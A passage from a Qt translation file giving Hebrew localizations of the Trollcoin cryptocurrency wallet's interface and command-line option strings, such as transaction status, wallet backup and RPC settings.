<translation>מקור</translation>
</message>
<message>
<location line="+0"/>
<source>Generated</source>
<translation>נוצר</translation>
</message>
<message>
<location line="+5"/>
<location line="+17"/>
<source>From</source>
<translation>מאת</translation>
</message>
<message>
<location line="+1"/>
<location line="+22"/>
<location line="+58"/>
<source>To</source>
<translation>אל</translation>
</message>
<message>
<location line="-77"/>
<location line="+2"/>
<source>own address</source>
<translation>כתובת עצמית</translation>
</message>
<message>
<location line="-2"/>
<source>label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+37"/>
<location line="+12"/>
<location line="+45"/>
<location line="+17"/>
<location line="+30"/>
<source>Credit</source>
<translation>זיכוי</translation>
</message>
<message numerus="yes">
<location line="-102"/>
<source>matures in %n more block(s)</source>
<translation><numerusform>מבשיל בעוד בלוק אחד</numerusform><numerusform>מבשיל בעוד %n בלוקים</numerusform></translation>
</message>
<message>
<location line="+2"/>
<source>not accepted</source>
<translation>לא התקבל</translation>
</message>
<message>
<location line="+44"/>
<location line="+8"/>
<location line="+15"/>
<location line="+30"/>
<source>Debit</source>
<translation>חיוב</translation>
</message>
<message>
<location line="-39"/>
<source>Transaction fee</source>
<translation>עמלת פעולה</translation>
</message>
<message>
<location line="+16"/>
<source>Net amount</source>
<translation>כמות נקיה</translation>
</message>
<message>
<location line="+6"/>
<source>Message</source>
<translation>הודעה</translation>
</message>
<message>
<location line="+2"/>
<source>Comment</source>
<translation>הערה</translation>
</message>
<message>
<location line="+2"/>
<source>Transaction ID</source>
<translation>זיהוי פעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Generated coins must mature 120 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to "not accepted" and it won't be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source>
        <translation>מטבעות שנוצרים חייבים להבשיל למשך 120 בלוקים לפני שניתן לנצל אותם. כשיצרת את הבלוק הזה, הוא הופץ לרשת כדי להתווסף לשרשרת הבלוקים. אם הוא אינו מצליח להגיע לשרשרת, המצב שלו ישתנה ל"לא התקבל" ולא ניתן יהיה לנצל אותו. זה עשוי לקרות מעת לעת אם צומת אחר יוצר בלוק בטווח של מספר שניות מהבלוק שלך.</translation>
</message>
<message>
<location line="+7"/>
<source>Debug information</source>
<translation>מידע ניפוי</translation>
</message>
<message>
<location line="+8"/>
<source>Transaction</source>
<translation>פעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Inputs</source>
<translation>קלטים</translation>
</message>
<message>
<location line="+23"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message>
<location line="+1"/>
<source>true</source>
<translation>אמת</translation>
</message>
<message>
<location line="+0"/>
<source>false</source>
<translation>שקר</translation>
</message>
<message>
<location line="-209"/>
<source>, has not been successfully broadcast yet</source>
<translation>, טרם שודר בהצלחה</translation>
</message>
<message numerus="yes">
<location line="-35"/>
<source>Open for %n more block(s)</source>
        <translation><numerusform>פתוח למשך בלוק אחד נוסף</numerusform><numerusform>פתוח למשך %n בלוקים נוספים</numerusform></translation>
</message>
<message>
<location line="+70"/>
<source>unknown</source>
<translation>לא ידוע</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<location filename="../forms/transactiondescdialog.ui" line="+14"/>
<source>Transaction details</source>
<translation>פרטי הפעולה</translation>
</message>
<message>
<location line="+6"/>
<source>This pane shows a detailed description of the transaction</source>
<translation>חלונית זו מציגה תיאור מפורט של הפעולה</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<location filename="../transactiontablemodel.cpp" line="+225"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+0"/>
<source>Type</source>
<translation>סוג</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+0"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message numerus="yes">
<location line="+57"/>
<source>Open for %n more block(s)</source>
        <translation><numerusform>פתוח למשך בלוק אחד נוסף</numerusform><numerusform>פתוח למשך %n בלוקים נוספים</numerusform></translation>
</message>
<message>
<location line="+3"/>
<source>Open until %1</source>
<translation>פתוח עד %1</translation>
</message>
<message>
<location line="+3"/>
<source>Offline (%1 confirmations)</source>
<translation>לא מחובר (%1 אישורים)</translation>
</message>
<message>
<location line="+3"/>
<source>Unconfirmed (%1 of %2 confirmations)</source>
<translation>ממתין לאישור (%1 מתוך %2 אישורים)</translation>
</message>
<message>
<location line="+3"/>
<source>Confirmed (%1 confirmations)</source>
<translation>מאושר (%1 אישורים)</translation>
</message>
<message numerus="yes">
<location line="+8"/>
<source>Mined balance will be available when it matures in %n more block(s)</source>
<translation><numerusform>המאזן שנכרה יהיה זמין כשהוא מבשיל בעוד בלוק אחד</numerusform><numerusform>המאזן שנכרה יהיה זמין כשהוא מבשיל בעוד %n בלוקים</numerusform></translation>
</message>
<message>
<location line="+5"/>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>הבלוק הזה לא נקלט על ידי אף צומת אחר, וכנראה לא יתקבל!</translation>
</message>
<message>
<location line="+3"/>
<source>Generated but not accepted</source>
<translation>נוצר אך לא התקבל</translation>
</message>
<message>
<location line="+43"/>
<source>Received with</source>
<translation>התקבל עם</translation>
</message>
<message>
<location line="+2"/>
<source>Received from</source>
<translation>התקבל מאת</translation>
</message>
<message>
<location line="+3"/>
<source>Sent to</source>
<translation>נשלח ל</translation>
</message>
<message>
<location line="+2"/>
<source>Payment to yourself</source>
<translation>תשלום לעצמך</translation>
</message>
<message>
<location line="+2"/>
<source>Mined</source>
<translation>נכרה</translation>
</message>
<message>
<location line="+38"/>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<location line="+199"/>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>מצב הפעולה. השהה את הסמן מעל שדה זה כדי לראות את מספר האישורים.</translation>
</message>
<message>
<location line="+2"/>
<source>Date and time that the transaction was received.</source>
<translation>התאריך והשעה בה הפעולה הזאת התקבלה.</translation>
</message>
<message>
<location line="+2"/>
<source>Type of transaction.</source>
<translation>סוג הפעולה.</translation>
</message>
<message>
<location line="+2"/>
<source>Destination address of transaction.</source>
<translation>כתובת היעד של הפעולה.</translation>
</message>
<message>
<location line="+2"/>
<source>Amount removed from or added to balance.</source>
<translation>הכמות שהתווספה או הוסרה מהיתרה.</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<location filename="../transactionview.cpp" line="+52"/>
<location line="+16"/>
<source>All</source>
<translation>הכל</translation>
</message>
<message>
<location line="-15"/>
<source>Today</source>
<translation>היום</translation>
</message>
<message>
<location line="+1"/>
<source>This week</source>
<translation>השבוע</translation>
</message>
<message>
<location line="+1"/>
<source>This month</source>
<translation>החודש</translation>
</message>
<message>
<location line="+1"/>
<source>Last month</source>
<translation>החודש שעבר</translation>
</message>
<message>
<location line="+1"/>
<source>This year</source>
<translation>השנה</translation>
</message>
<message>
<location line="+1"/>
<source>Range...</source>
<translation>טווח...</translation>
</message>
<message>
<location line="+11"/>
<source>Received with</source>
<translation>התקבל עם</translation>
</message>
<message>
<location line="+2"/>
<source>Sent to</source>
<translation>נשלח ל</translation>
</message>
<message>
<location line="+2"/>
<source>To yourself</source>
<translation>לעצמך</translation>
</message>
<message>
<location line="+1"/>
<source>Mined</source>
<translation>נכרה</translation>
</message>
<message>
<location line="+1"/>
<source>Other</source>
<translation>אחר</translation>
</message>
<message>
<location line="+7"/>
<source>Enter address or label to search</source>
        <translation>הכנס כתובת או תוית לחיפוש</translation>
</message>
<message>
<location line="+7"/>
<source>Min amount</source>
<translation>כמות מזערית</translation>
</message>
<message>
<location line="+34"/>
<source>Copy address</source>
<translation>העתק כתובת</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>העתק תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>העתק כמות</translation>
</message>
<message>
<location line="+1"/>
<source>Copy transaction ID</source>
<translation>העתק מזהה פעולה</translation>
</message>
<message>
<location line="+1"/>
<source>Edit label</source>
<translation>ערוך תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Show transaction details</source>
<translation>הצג פרטי פעולה</translation>
</message>
<message>
<location line="+139"/>
<source>Export Transaction Data</source>
<translation>יצוא נתוני פעולות</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>קובץ מופרד בפסיקים (*.csv)</translation>
</message>
<message>
<location line="+8"/>
<source>Confirmed</source>
<translation>מאושר</translation>
</message>
<message>
<location line="+1"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+1"/>
<source>Type</source>
<translation>סוג</translation>
</message>
<message>
<location line="+1"/>
<source>Label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+1"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message>
<location line="+1"/>
<source>ID</source>
<translation>מזהה</translation>
</message>
<message>
<location line="+4"/>
<source>Error exporting</source>
<translation>שגיאה ביצוא</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>לא מסוגל לכתוב לקובץ %1.</translation>
</message>
<message>
<location line="+100"/>
<source>Range:</source>
<translation>טווח:</translation>
</message>
<message>
<location line="+8"/>
<source>to</source>
        <translation>עד</translation>
</message>
</context>
<context>
<name>WalletModel</name>
<message>
<location filename="../walletmodel.cpp" line="+193"/>
<source>Send Coins</source>
<translation>שלח מטבעות</translation>
</message>
</context>
<context>
<name>WalletView</name>
<message>
<location filename="../walletview.cpp" line="+42"/>
<source>&Export</source>
        <translation>&יצוא</translation>
</message>
<message>
<location line="+1"/>
<source>Export the data in the current tab to a file</source>
<translation>יצוא הנתונים בטאב הנוכחי לקובץ</translation>
</message>
<message>
<location line="+193"/>
<source>Backup Wallet</source>
<translation>גבה ארנק</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet Data (*.dat)</source>
<translation>נתוני ארנק (*.dat)</translation>
</message>
<message>
<location line="+3"/>
<source>Backup Failed</source>
<translation>גיבוי נכשל</translation>
</message>
<message>
<location line="+0"/>
<source>There was an error trying to save the wallet data to the new location.</source>
<translation>הייתה שגיאה בניסיון לשמור את נתוני הארנק למיקום החדש.</translation>
</message>
<message>
<location line="+4"/>
<source>Backup Successful</source>
<translation>גיבוי הושלם בהצלחה</translation>
</message>
<message>
<location line="+0"/>
<source>The wallet data was successfully saved to the new location.</source>
<translation>נתוני הארנק נשמרו בהצלחה במקום החדש.</translation>
</message>
</context>
<context>
<name>bitcoin-core</name>
<message>
<location filename="../bitcoinstrings.cpp" line="+94"/>
<source>Trollcoin version</source>
<translation>גרסת טרולקוין</translation>
</message>
<message>
<location line="+102"/>
<source>Usage:</source>
<translation>שימוש:</translation>
</message>
<message>
<location line="-29"/>
<source>Send command to -server or trollcoind</source>
<translation>שלח פקודה ל -server או trollcoind</translation>
</message>
<message>
<location line="-23"/>
<source>List commands</source>
<translation>רשימת פקודות</translation>
</message>
<message>
<location line="-12"/>
<source>Get help for a command</source>
<translation>קבל עזרה עבור פקודה</translation>
</message>
<message>
<location line="+24"/>
<source>Options:</source>
<translation>אפשרויות:</translation>
</message>
<message>
<location line="+24"/>
<source>Specify configuration file (default: trollcoin.conf)</source>
<translation>ציין קובץ הגדרות (ברירת מחדל: trollcoin.conf)</translation>
</message>
<message>
<location line="+3"/>
<source>Specify pid file (default: trollcoind.pid)</source>
<translation>ציין קובץ pid (ברירת מחדל: trollcoind.pid)</translation>
</message>
<message>
<location line="-1"/>
<source>Specify data directory</source>
<translation>ציין תיקיית נתונים</translation>
</message>
<message>
<location line="-9"/>
<source>Set database cache size in megabytes (default: 25)</source>
<translation>קבע את גודל המטמון של מסד הנתונים במגהבייט (ברירת מחדל: 25)</translation>
</message>
<message>
<location line="-28"/>
<source>Listen for connections on <port> (default: 9333 or testnet: 19333)</source>
<translation>האזן לחיבורים ב-<port> (ברירת מחדל: 9333 או ברשת הבדיקה: 19333)</translation>
</message>
<message>
<location line="+5"/>
<source>Maintain at most <n> connections to peers (default: 125)</source>
<translation>החזק לכל היותר <n> חיבורים לעמיתים (ברירת מחדל: 125)</translation>
</message>
<message>
<location line="-48"/>
<source>Connect to a node to retrieve peer addresses, and disconnect</source>
<translation>התחבר לצומת כדי לדלות כתובות עמיתים, ואז התנתק</translation>
</message>
<message>
<location line="+82"/>
<source>Specify your own public address</source>
<translation>ציין את הכתובת הפומבית שלך</translation>
</message>
<message>
<location line="+3"/>
<source>Threshold for disconnecting misbehaving peers (default: 100)</source>
<translation>סף להתנתקות מעמיתים הנוהגים שלא כהלכה (ברירת מחדל: 100)</translation>
</message>
<message>
<location line="-134"/>
<source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source>
<translation>מספר שניות למנוע מעמיתים הנוהגים שלא כהלכה מלהתחבר מחדש (ברירת מחדל: 86400)</translation>
</message>
<message>
<location line="-29"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source>
<translation>אירעה שגיאה בעת הגדרת פורט RPC %u להאזנה ב-IPv4: %s</translation>
</message>
<message>
<location line="+27"/>
<source>Listen for JSON-RPC connections on <port> (default: 9332 or testnet: 19332)</source>
<translation>האזן לחיבורי JSON-RPC ב- <port> (ברירת מחדל: 9332 או רשת בדיקה: 19332)</translation>
</message>
<message>
<location line="+37"/>
<source>Accept command line and JSON-RPC commands</source>
<translation>קבל פקודות משורת הפקודה ו- JSON-RPC</translation>
</message>
<message>
<location line="+76"/>
<source>Run in the background as a daemon and accept commands</source>
<translation>רוץ ברקע כדימון וקבל פקודות</translation>
</message>
<message>
<location line="+37"/>
<source>Use the test network</source>
<translation>השתמש ברשת הבדיקה</translation>
</message>
<message>
<location line="-112"/>
<source>Accept connections from outside (default: 1 if no -proxy or -connect)</source>
<translation>קבל חיבורים מבחוץ (ברירת מחדל: 1 ללא -proxy או -connect)</translation>
</message>
<message>
<location line="-80"/>
<source>%s, you must set a rpcpassword in the configuration file:
%s
It is recommended you use the following random password:
rpcuser=trollcoinrpc
rpcpassword=%s
(you do not need to remember this password)
The username and password MUST NOT be the same.
If the file does not exist, create it with owner-readable-only file permissions.
It is also recommended to set alertnotify so you are notified of problems;
for example: alertnotify=echo %%s | mail -s "Trollcoin Alert" admin@foo.com
</source>
<translation>%s, עליך לקבוע סיסמת RPC בקובץ הקונפיגורציה:
%s
מומלץ להשתמש בסיסמא האקראית הבאה:
rpcuser=trollcoinrpc
rpcpassword=%s
(אין צורך לזכור את הסיסמה)
אסור ששם המשתמש והסיסמא יהיו זהים.
אם הקובץ אינו קיים, צור אותו עם הרשאות קריאה לבעלים בלבד.
מומלץ גם להגדיר alertnotify כדי לקבל דיווח על תקלות;
למשל: alertnotify=echo %%s | mail -s "Trollcoin Alert" admin@foo.com
</translation>
</message>
<message>
<location line="+17"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source>
<translation>אירעה שגיאה בעת הגדרת פורט RPC %u להאזנה ב-IPv6, נסוג ל-IPv4: %s</translation>
</message>
<message>
<location line="+3"/>
<source>Bind to given address and always listen on it. Use [host]:port notation for IPv6</source>
<translation>קשור עם כתובת נתונה והאזן לה תמיד. השתמש בסימון [host]:port עבור IPv6.</translation>
</message>
<message>
<location line="+3"/>
<source>Cannot obtain a lock on data directory %s. Trollcoin is probably already running.</source>
<translation>לא מסוגל להשיג נעילה על תיקיית הנתונים %s. כנראה שטרולקוין כבר רץ.</translation>
</message>
<message>
<location line="+3"/>
<source>Error: The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>שגיאה: הפעולה נדחתה! זה עלול לקרות אם כמה מהמטבעות בארנק שלך כבר נוצלו, למשל אם השתמשת בעותק של wallet.dat ומטבעות נשלחו בעותק אך לא סומנו כמנוצלות כאן.</translation>
</message>
<message>
<location line="+4"/>
<source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds!</source>
<translation>שגיאה: הפעולה הזאת דורשת עמלת פעולה של לפחות %s עקב הכמות, המורכבות, או השימוש בכספים שהתקבלו לאחרונה!</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source>
<translation>בצע פקודה כאשר התראה רלוונטית מתקבלת (%s בפקודה יוחלף בהודעה)</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source>
<translation>בצע פקודה כאשר פעולת ארנק משתנה (%s ב cmd יוחלף ב TxID)</translation>
</message>
<message>
<location line="+11"/>
<source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source>
<translation>קבע גודל מקסימלי עבור פעולות עדיפות גבוהה/עמלה נמוכה בבתים (ברירת מחדל: 27000)</translation>
</message>
<message>
<location line="+6"/>
<source>This is a pre-release test build - use at your own risk - do not use for mining or merchant applications</source>
<translation>זוהי בניית ניסיון טרום-שחרור - השימוש בה על אחריותך - אין להשתמש לצורך כריה או יישומי מסחר</translation>
</message>
<message>
<location line="+5"/>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>אזהרה: -paytxfee נקבע לערך מאד גבוה! זוהי עמלת הפעולה שתשלם אם אתה שולח פעולה.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: Displayed transactions may not be correct! You may need to upgrade, or other nodes may need to upgrade.</source>
<translation>אזהרה: הפעולות המוצגות עשויות לא להיות נכונות! ייתכן ואתה צריך לשדרג, או שצמתים אחרים צריכים לשדרג.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: Please check that your computer's date and time are correct! If your clock is wrong Trollcoin will not work properly.</source>
<translation>אזהרה: אנא בדוק שהתאריך והשעה של המחשב שלך נכונים! אם השעון שלך אינו נכון טרולקוין לא יעבוד כראוי.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source>
<translation>אזהרה: שגיאה בקריאת wallet.dat! כל המפתחות נקראו באופן תקין, אך נתוני הפעולות או ספר הכתובות עלולים להיות חסרים או שגויים.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source>
<translation>אזהרה: קובץ wallet.dat מושחת, המידע חולץ! קובץ wallet.dat המקורי נשמר כ-wallet.{timestamp}.bak ב-%s; אם המאזן או הפעולות שגויים עליך לשחזר מגיבוי.</translation>
</message>
<message>
<location line="+14"/>
<source>Attempt to recover private keys from a corrupt wallet.dat</source>
<translation>נסה לשחזר מפתחות פרטיים מקובץ wallet.dat מושחת.</translation>
</message>
<message>
<location line="+2"/>
<source>Block creation options:</source>
<translation>אפשרויות יצירת בלוק:</translation>
</message>
<message>
<location line="+5"/>
<source>Connect only to the specified node(s)</source>
<translation>התחבר רק לצמתים המצוינים</translation>
</message>
<message>
<location line="+3"/>
<source>Corrupted block database detected</source>
<translation>התגלה מסד נתוני בלוקים לא תקין</translation>
</message>
<message>
<location line="+1"/>
<source>Discover own IP address (default: 1 when listening and no -externalip)</source>
<translation>גלה את כתובת ה-IP העצמית (ברירת מחדל: 1 כשמאזינים וללא -externalip)</translation>
</message>
<message>
<location line="+1"/>
<source>Do you want to rebuild the block database now?</source>
<translation>האם תרצה כעת לבנות מחדש את מסד נתוני הבלוקים?</translation>
</message>
<message>
<location line="+2"/>
<source>Error initializing block database</source>
<translation>שגיאה באתחול מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+1"/>
<source>Error initializing wallet database environment %s!</source>
<translation>שגיאה באתחול סביבת מסד נתוני הארנקים %s!</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading block database</source>
<translation>שגיאה בטעינת מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+4"/>
<source>Error opening block database</source>
<translation>שגיאה בפתיחת מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+2"/>
<source>Error: Disk space is low!</source>
<translation>שגיאה: מעט מקום פנוי בדיסק!</translation>
</message>
<message>
<location line="+1"/>
<source>Error: Wallet locked, unable to create transaction!</source>
<translation>שגיאה: הארנק נעול, אין אפשרות ליצור פעולה!</translation>
</message>
<message>
<location line="+1"/>
<source>Error: system error: </source>
<translation>שגיאה: שגיאת מערכת:</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to listen on any port. Use -listen=0 if you want this.</source>
<translation>האזנה נכשלה בכל פורט. השתמש ב- -listen=0 אם ברצונך בכך.</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to read block info</source>
<translation>קריאת מידע הבלוקים נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to read block</source>
<translation>קריאת הבלוק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to sync block index</source>
<translation>סנכרון אינדקס הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block index</source>
<translation>כתיבת אינדקס הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block info</source>
<translation>כתיבת מידע הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block</source>
<translation>כתיבת הבלוק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write file info</source>
<translation>כתיבת מידע הקבצים נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write to coin database</source>
<translation>כתיבת מסד נתוני המטבעות נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write transaction index</source>
<translation>כתיבת אינדקס הפעולות נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write undo data</source>
<translation>כתיבת נתוני ביטול נכשלה</translation>
</message>
<message>
<location line="+2"/>
<source>Find peers using DNS lookup (default: 1 unless -connect)</source>
<translation>מצא עמיתים ע"י חיפוש DNS (ברירת מחדל: 1 ללא -connect)</translation>
</message>
<message>
<location line="+1"/>
<source>Generate coins (default: 0)</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+2"/>
<source>How many blocks to check at startup (default: 288, 0 = all)</source>
<translation>מספר הבלוקים לבדוק בעת אתחול (ברירת מחדל: 288, 0 = כולם)</translation>
</message>
<message>
<location line="+1"/>
<source>How thorough the block verification is (0-4, default: 3)</source>
<translation>מידת היסודיות של אימות הבלוקים (0-4, ברירת מחדל: 3)</translation>
</message>
<message>
<location line="+19"/>
<source>Not enough file descriptors available.</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+8"/>
<source>Rebuild block chain index from current blk000??.dat files</source>
<translation>בנה מחדש את אינדקס שרשרת הבלוקים מקבצי ה-blk000??.dat הנוכחיים.</translation>
</message>
<message>
<location line="+16"/>
<source>Set the number of threads to service RPC calls (default: 4)</source>
<translation>קבע את מספר התהליכונים לשירות קריאות RPC (ברירת מחדל: 4)</translation>
</message>
<message>
<location line="+26"/>
<source>Verifying blocks...</source>
<translation>מאמת בלוקים...</translation>
</message>
<message>
<location line="+1"/>
<source>Verifying wallet...</source>
<translation>מאמת ארנק...</translation>
</message>
<message>
<location line="-69"/>
<source>Imports blocks from external blk000??.dat file</source>
<translation>מייבא בלוקים מקובצי blk000??.dat חיצוניים</translation>
</message>
<message>
<location line="-76"/>
<source>Set the number of script verification threads (up to 16, 0 = auto, <0 = leave that many cores free, default: 0)</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+77"/>
<source>Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+3"/>
<source>Invalid -tor address: '%s'</source>
<translation>כתובת לא תקינה ל -tor: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Invalid amount for -minrelaytxfee=<amount>: '%s'</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Invalid amount for -mintxfee=<amount>: '%s'</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+8"/>
<source>Maintain a full transaction index (default: 0)</source>
<translation>תחזק אינדקס פעולות מלא (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+2"/>
<source>Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000)</source>
<translation>חוצץ קבלה מירבי לכל חיבור, <n>*1000 בתים (ברירת מחדל: 5000)</translation>
</message>
<message>
<location line="+1"/>
<source>Maximum per-connection send buffer, <n>*1000 bytes (default: 1000)</source>
<translation>חוצץ שליחה מירבי לכל חיבור, <n>*1000 בתים (ברירת מחדל: 1000)</translation>
</message>
<message>
<location line="+2"/>
<source>Only accept block chain matching built-in checkpoints (default: 1)</source>
<translation>קבל רק שרשרת בלוקים התואמת נקודות ביקורת מובנות (ברירת מחדל: 1)</translation>
</message>
<message>
<location line="+1"/>
<source>Only connect to nodes in network <net> (IPv4, IPv6 or Tor)</source>
<translation>התחבר רק לצמתים ברשת <net> (IPv4, IPv6 או Tor)</translation>
</message>
<message>
<location line="+2"/>
<source>Output extra debugging information. Implies all other -debug* options</source>
<translation>פלוט מידע ניפוי שגיאות נוסף. גורר את כל אפשרויות -debug* האחרות.</translation>
</message>
<message>
<location line="+1"/>
<source>Output extra network debugging information</source>
<translation>פלוט מידע נוסף לניפוי שגיאות ברשת.</translation>
</message>
<message>
<location line="+2"/>
<source>Prepend debug output with timestamp</source>
<translation>הוסף חותמת זמן לפני פלט דיבאג</translation>
</message>
<message>
<location line="+5"/>
<source>SSL options: (see the Trollcoin Wiki for SSL setup instructions)</source>
<translation>אפשרויות SSL: (ראה את הויקי של טרולקוין עבור הוראות הגדרת SSL)</translation>
</message>
<message>
<location line="+1"/>
<source>Select the version of socks proxy to use (4-5, default: 5)</source>
<translation>בחר את גרסת פרוקסי SOCKS להשתמש בה (4-5, ברירת מחדל: 5)</translation>
</message>
<message>
<location line="+3"/>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>שלח מידע דיבאג ועקבה לקונסולה במקום לקובץ debug.log</translation>
</message>
<message>
<location line="+1"/>
<source>Send trace/debug info to debugger</source>
<translation>שלח מידע דיבאג ועקבה לכלי דיבאג</translation>
</message>
<message>
<location line="+5"/>
<source>Set maximum block size in bytes (default: 250000)</source>
<translation>קבע את גודל הבלוק המירבי בבתים (ברירת מחדל: 250000)</translation>
</message>
<message>
<location line="+1"/>
<source>Set minimum block size in bytes (default: 0)</source>
<translation>קבע את גודל הבלוק המינימלי בבתים (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+2"/>
<source>Shrink debug.log file on client startup (default: 1 when no -debug)</source>
<translation>כווץ את קובץ debug.log בהפעלת הקליינט (ברירת מחדל: 1 ללא -debug)</translation>
</message>
<message>
<location line="+1"/>
<source>Signing transaction failed</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+2"/>
<source>Specify connection timeout in milliseconds (default: 5000)</source>
<translation>ציין הגבלת זמן לחיבור במילישניות (ברירת מחדל: 5000)</translation>
</message>
<message>
<location line="+4"/>
<source>System error: </source>
<translation>שגיאת מערכת:</translation>
</message>
<message>
<location line="+4"/>
<source>Transaction amount too small</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Transaction amounts must be positive</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Transaction too large</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+7"/>
<source>Use UPnP to map the listening port (default: 0)</source>
<translation>השתמש ב-UPnP כדי למפות את הפורט להאזנה (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+1"/>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>השתמש ב-UPnP כדי למפות את הפורט להאזנה (ברירת מחדל: 1 בעת האזנה)</translation>
</message>
<message>
<location line="+1"/>
<source>Use proxy to reach tor hidden services (default: same as -proxy)</source>
<translation>השתמש בפרוקסי כדי להגיע לשירותים חבויים ב-tor (ברירת מחדל: כמו ב- -proxy)</translation>
</message>
<message>
<location line="+2"/>
<source>Username for JSON-RPC connections</source>
<translation>שם משתמש לחיבורי JSON-RPC</translation>
</message>
<message>
<location line="+4"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: This version is obsolete, upgrade required!</source>
<translation>אזהרה: הגרסה הזאת מיושנת, יש צורך בשדרוג!</translation>
</message>
<message>
<location line="+1"/>
<source>You need to rebuild the databases using -reindex to change -txindex</source>
<translation>עליך לבנות מחדש את מסדי הנתונים תוך שימוש ב- -reindex על מנת לשנות את -txindex</translation>
</message>
<message>
<location line="+1"/>
<source>wallet.dat corrupt, salvage failed</source>
<translation>קובץ wallet.dat מושחת, החילוץ נכשל</translation>
</message>
<message>
<location line="-50"/>
<source>Password for JSON-RPC connections</source>
<translation>סיסמה לחיבורי JSON-RPC</translation>
</message>
<message>
<location line="-67"/>
<source>Allow JSON-RPC connections from specified IP address</source>
<translation>אפשר חיבורי JSON-RPC מכתובת האינטרנט המצוינת</translation>
</message>
<message>
<location line="+76"/>
<source>Send commands to node running on <ip> (default: 127.0.0.1)</source>
<translation>שלח פקודות לצומת ב-<ip> (ברירת מחדל: 127.0.0.1)</translation>
</message>
<message>
<location line="-120"/>
<source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source>
<translation>בצע פקודה זו כשהבלוק הטוב ביותר משתנה (%s בפקודה יוחלף בגיבוב הבלוק)</translation>
</message>
<message>
<location line="+147"/>
<source>Upgrade wallet to latest format</source>
<translation>שדרג את הארנק לפורמט העדכני</translation>
</message>
<message>
<location line="-21"/>
<source>Set key pool size to <n> (default: 100)</source>
<translation>קבע את גודל מאגר המפתחות ל-<n> (ברירת מחדל: 100)</translation>
</message>
<message>
<location line="-12"/>
<source>Rescan the block chain for missing wallet transactions</source>
